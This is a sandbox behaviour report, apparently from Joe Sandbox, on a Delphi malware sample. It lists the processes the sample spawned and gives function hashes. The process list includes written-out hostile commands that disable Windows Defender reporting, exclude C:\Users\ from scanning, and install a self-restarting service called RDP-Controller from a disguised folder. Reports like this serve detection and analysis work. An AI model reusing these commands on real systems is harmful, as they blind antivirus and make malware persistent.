                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:11:48:53
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\Desktop\cZO.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5 hash:BE6E88537235FF3B6B61DE70DFEECB3B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:11:48:54
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:4'528'128 bytes
                                                                                                                                                MD5 hash:BE6E88537235FF3B6B61DE70DFEECB3B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:11:48:57
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
                                                                                                                                                Imagebase:0x7ff7e6bf0000
                                                                                                                                                File size:289'792 bytes
                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:11:48:57
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:11:48:58
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:11:48:59
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe"
                                                                                                                                                Imagebase:0x7ff775720000
                                                                                                                                                File size:98'304 bytes
                                                                                                                                                MD5 hash:319865D78CC8DF6270E27521B8182BFF
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 58%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:11:49:01
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:11:49:03
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:11:49:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe"
                                                                                                                                                Imagebase:0x7ff76a370000
                                                                                                                                                File size:10'669'056 bytes
                                                                                                                                                MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                                                                                                                                                Imagebase:0x7ff6dddf0000
                                                                                                                                                File size:101'376 bytes
                                                                                                                                                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe stop RDP-Controller
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:16
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:17
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:18
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:19
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:20
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\sc.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:sc.exe start RDP-Controller
                                                                                                                                                Imagebase:0x7ff7a6850000
                                                                                                                                                File size:72'192 bytes
                                                                                                                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:21
                                                                                                                                                Start time:11:49:37
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:22
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Imagebase:0x7ff6be030000
                                                                                                                                                File size:89'088 bytes
                                                                                                                                                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 70%, ReversingLabs
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:23
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                                                                                                                                Imagebase:0x7ff7e8710000
                                                                                                                                                File size:39'424 bytes
                                                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:24
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:25
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\icacls.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                                                                                                                                                Imagebase:0x7ff7e8710000
                                                                                                                                                File size:39'424 bytes
                                                                                                                                                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:26
                                                                                                                                                Start time:11:49:38
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:28
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:29
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
                                                                                                                                                Imagebase:0x7ff6f3c80000
                                                                                                                                                File size:570'736 bytes
                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:30
                                                                                                                                                Start time:11:50:34
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
                                                                                                                                                Imagebase:0x7ff6f3c80000
                                                                                                                                                File size:570'736 bytes
                                                                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:31
                                                                                                                                                Start time:11:50:35
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                File size:55'320 bytes
                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:32
                                                                                                                                                Start time:11:50:59
                                                                                                                                                Start date:05/01/2025
                                                                                                                                                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                Imagebase:0x7ff6be030000
                                                                                                                                                File size:89'088 bytes
                                                                                                                                                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:false

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 024D9CF6 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA053
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA059
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DA05F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                  • Opcode ID: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                                                                                                                                                  • Instruction ID: 4ee74b5b43023d096468648be90f754803d073c7b2debd6c1b66af0119169aed
                                                                                                                                                  • Opcode Fuzzy Hash: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
                                                                                                                                                  • Instruction Fuzzy Hash: 7FB17D31918A4C8FDB54EF29C894AAEB7E1FFA8314F50571EE88AD3255DB709481CB81
                                                                                                                                                  Function 024DCDA6 Relevance: 3.3, APIs: 2, Instructions: 338COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DD0EB
                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 024DD0F1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3668304517-0
                                                                                                                                                  • Opcode ID: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                                                                                                                                                  • Instruction ID: 4f9e23efbfe377bcb116552b0931d129612a226f6bc1b2dd24a3477e0d1a83be
                                                                                                                                                  • Opcode Fuzzy Hash: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
                                                                                                                                                  • Instruction Fuzzy Hash: C2A18E31928B4C8BDB55EF2DC894AEAB7E2FB99314F50571FE48AC3254DB309581CB81
                                                                                                                                                  Function 024D4B4A Relevance: 1.8, APIs: 1, Instructions: 343COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                                                                                                                                                  • Instruction ID: f863e0ad4f8aeb9fc94725681f3d2689ae89c542ab32be7a6272ffab34643977
                                                                                                                                                  • Opcode Fuzzy Hash: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
                                                                                                                                                  • Instruction Fuzzy Hash: 1FA1B531618E0C8FCB58EF28D495AAEB7E1FBA9314F01461FE44ED3254DA30E985CB85
                                                                                                                                                  Function 024ED122 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _clrfp
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3618594692-0
                                                                                                                                                  • Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                                                                                                                                                  • Instruction ID: 2507883226572b18e3c556567a44ea7e7246214c2df603957cd21a8dc14b1e42
                                                                                                                                                  • Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
                                                                                                                                                  • Instruction Fuzzy Hash: A6B15830910A4DCFEB99DF1CC88AB5677E1FF59309F19859AE85ACB262C335D852CB01
                                                                                                                                                  Function 024D7F2E Relevance: .4, Instructions: 446COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                                                                                                                                                  • Instruction ID: 9f2d99ea6b90e45e65382ca119b92d594e642ffb8f6c2caf06c62797761bf565
                                                                                                                                                  • Opcode Fuzzy Hash: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
                                                                                                                                                  • Instruction Fuzzy Hash: 78E18331918B8C8BC745DF68C8946BAB3E1FFA9300F50571FE486D3255EB74A685CB81
                                                                                                                                                  Function 024E701E Relevance: .2, Instructions: 250COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                                                                                                  • Instruction ID: 94151202dd1031304a6f7d83c6b5e153e51c36033d666cd4e8910bad687a67ae
                                                                                                                                                  • Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
                                                                                                                                                  • Instruction Fuzzy Hash: 7B61087091CB5C4FEF28EF68984917ABBE5FB95721F00465FE487C3255DB70A8428AC2
                                                                                                                                                  Function 024E53EA Relevance: .2, Instructions: 219COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                                                                                                  • Instruction ID: 0061ef829e87c82a0d9c2b3a97faa44e36fddc2267b0cf17796596f338105e6f
                                                                                                                                                  • Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
                                                                                                                                                  • Instruction Fuzzy Hash: 9F51E432718E0C4F9B1CDF6CD49867673D2EBAC315315822EE40BD72A5DA70D8468785
                                                                                                                                                  Function 024D60CE Relevance: .1, Instructions: 91COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2007395488.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_24d0000_cZO.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                                                                                                                                  • Instruction ID: 71086d250f1f2ba5fdf0473999e0b70f2c48b4913439d22f63300f2ec25f5760
                                                                                                                                                  • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
